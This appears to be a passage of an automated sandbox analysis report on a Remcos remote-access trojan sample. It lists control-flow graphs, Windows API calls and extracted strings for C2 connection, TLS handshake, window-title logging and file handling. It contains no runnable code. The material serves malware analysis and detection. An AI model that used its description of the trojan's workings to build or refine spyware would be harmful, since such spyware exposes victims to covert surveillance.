                                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                        • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                        • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                        • Instruction Fuzzy Hash:

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 48 40ef2d-40ef3e call 401fd8 22->48 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 98 40ec27-40ec3d call 401fab call 4139e4 80->98 90 40ec47-40ec49 81->90 91 40ec4e-40ec55 81->91 94 40ef2c 90->94 95 40ec57 91->95 96 40ec59-40ec65 call 41b354 91->96 94->48 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 98->81 123 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->123 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 129 40ecc6 call 407790 107->129 130 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->130 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 141 40ec9c-40eca2 120->141 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 123->157 129->130 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 130->177 178 40edbb-40edbf 130->178 141->107 144 40eca4-40ecaa 141->144 144->107 147 40ecac call 40729b 144->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 192 40ee59-40ee7d call 40247c call 434829 184->192 185->192 213 40ee8c 192->213 214 40ee7f-40ee8a call 436f10 192->214 205->178 216 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 213->216 214->216 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 216->273 286 40f017-40f019 236->286 287 40effc 236->287 273->236 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->288 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->236 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 380 40f255-40f279 call 41b69e call 401f13 call 401f09 368->380 381 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->381 369->368 400 40f27b-40f27c SetProcessDEPPolicy 380->400 401 40f27e-40f291 CreateThread 380->401 381->380 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 428 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->428 443 40f381-40f386 DeleteFileW 428->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->123 445->123 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                          • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                        • API String ID: 2830904901-3701325316
                                                                                                        • Opcode ID: ffd12c19e2d50d6566cfdb16c9a1fe4d729625663bf98a0cf3a2b658e77689f2
                                                                                                        • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                        • Opcode Fuzzy Hash: ffd12c19e2d50d6566cfdb16c9a1fe4d729625663bf98a0cf3a2b658e77689f2
                                                                                                        • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-4151d2 WSAGetLastError call 41cb72 533->561 566 415220-415246 call 402093 * 2 call 41b580 560->566 567 41524b-415259 call 404f51 call 4048c8 560->567 565 4151d7-41520b call 4052fd call 402093 call 41b580 call 401fd8 561->565 582 415ade-415af0 call 404e26 call 4021fa 565->582 566->582 578 41525e-415260 567->578 581 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 578->581 578->582 648 4153bb-4153c8 call 405aa6 581->648 649 4153cd-4153f4 call 401fab call 4135e1 581->649 597 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 582->597 598 415b18-415b20 call 401e8d 582->598 597->598 598->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-415a51 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->656 655->656 902 415a53-415a5a 656->902 903 415a65-415a6c 656->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->582
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                                                        • String ID: | $%I64u$5.1.3 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                                        • API String ID: 524882891-3785195355
                                                                                                        • Opcode ID: 2d1c7af9d499926efb3ae2d98fbb0afc6155db4eb901ad44dd2e56ba281afa9b
                                                                                                        • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                                        • Opcode Fuzzy Hash: 2d1c7af9d499926efb3ae2d98fbb0afc6155db4eb901ad44dd2e56ba281afa9b
                                                                                                        • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 925 414dc1-414dfd 926 414e03-414e18 GetSystemDirectoryA 925->926 927 414f18-414f23 925->927 928 414f0e 926->928 929 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 926->929 928->927 934 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 929->934 935 414e6c-414e76 GetProcAddress 929->935 948 414f0a-414f0d 934->948 949 414ebd-414ec7 GetProcAddress 934->949 936 414e78-414e7b FreeLibrary 935->936 937 414e7d-414e7f 935->937 936->937 937->934 939 414ed2 937->939 942 414ed4-414ee5 GetProcAddress 939->942 943 414ee7-414eeb 942->943 944 414eef-414ef2 FreeLibrary 942->944 943->942 946 414eed 943->946 947 414ef4-414ef6 944->947 946->947 947->948 950 414ef8-414f08 947->950 948->928 951 414ec9-414ecc FreeLibrary 949->951 952 414ece-414ed0 949->952 950->948 950->950 951->952 952->939 952->948
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                        • API String ID: 2490988753-744132762
                                                                                                        • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                        • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                                        • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                        • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                          • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                          • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                          • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                          • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                        • API String ID: 3795512280-1152054767
                                                                                                        • Opcode ID: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                                                                        • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                        • Opcode Fuzzy Hash: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                                                                        • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1051 4048c8-4048e8 connect 1052 404a1b-404a1f 1051->1052 1053 4048ee-4048f1 1051->1053 1056 404a21-404a2f WSAGetLastError 1052->1056 1057 404a97 1052->1057 1054 404a17-404a19 1053->1054 1055 4048f7-4048fa 1053->1055 1058 404a99-404a9e 1054->1058 1059 404926-404930 call 420cf1 1055->1059 1060 4048fc-404923 call 40531e call 402093 call 41b580 1055->1060 1056->1057 1061 404a31-404a34 1056->1061 1057->1058 1070 404941-40494e call 420f20 1059->1070 1071 404932-40493c 1059->1071 1060->1059 1063 404a71-404a76 1061->1063 1064 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1061->1064 1067 404a7b-404a94 call 402093 * 2 call 41b580 1063->1067 1064->1057 1067->1057 1083 404950-404973 call 402093 * 2 call 41b580 1070->1083 1084 404987-404992 call 421ad1 1070->1084 1071->1067 1113 404976-404982 call 420d31 1083->1113 1096 4049c4-4049d1 call 420e97 1084->1096 1097 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1084->1097 1110 4049d3-4049f6 call 402093 * 2 call 41b580 1096->1110 1111 4049f9-404a14 CreateEventW * 2 1096->1111 1097->1113 1110->1111 1111->1054 1113->1057
                                                                                                        APIs
                                                                                                        • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                        • API String ID: 994465650-2151626615
                                                                                                        • Opcode ID: 1f2a59b67e7ec9f08a81800e0f1a4bfe07729ac7d8df955aa20f2323d6d34b4f
                                                                                                        • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                        • Opcode Fuzzy Hash: 1f2a59b67e7ec9f08a81800e0f1a4bfe07729ac7d8df955aa20f2323d6d34b4f
                                                                                                        • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                        • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 3658366068-0
                                                                                                        • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                        • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                        • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                        • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                        • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                                        • API String ID: 911427763-3954389425
                                                                                                        • Opcode ID: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                                                                        • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                        • Opcode Fuzzy Hash: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                                                                        • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1223 40da6f-40da94 call 401f86 1226 40da9a 1223->1226 1227 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1223->1227 1228 40dae0-40dae7 call 41c048 1226->1228 1229 40daa1-40daa6 1226->1229 1230 40db93-40db98 1226->1230 1231 40dad6-40dadb 1226->1231 1232 40dba9 1226->1232 1233 40db9a-40db9f call 43c11f 1226->1233 1234 40daab-40dab9 call 41b645 call 401f13 1226->1234 1235 40dacc-40dad1 1226->1235 1236 40db8c-40db91 1226->1236 1253 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1227->1253 1248 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1228->1248 1249 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1228->1249 1239 40dbae-40dbb3 call 43c11f 1229->1239 1230->1239 1231->1239 1232->1239 1244 40dba4-40dba7 1233->1244 1257 40dabe 1234->1257 1235->1239 1236->1239 1250 40dbb4-40dbb9 call 409092 1239->1250 1244->1232 1244->1250 1262 40dac2-40dac7 call 401f09 1248->1262 1249->1257 1250->1227 1257->1262 1262->1227
                                                                                                        APIs
                                                                                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
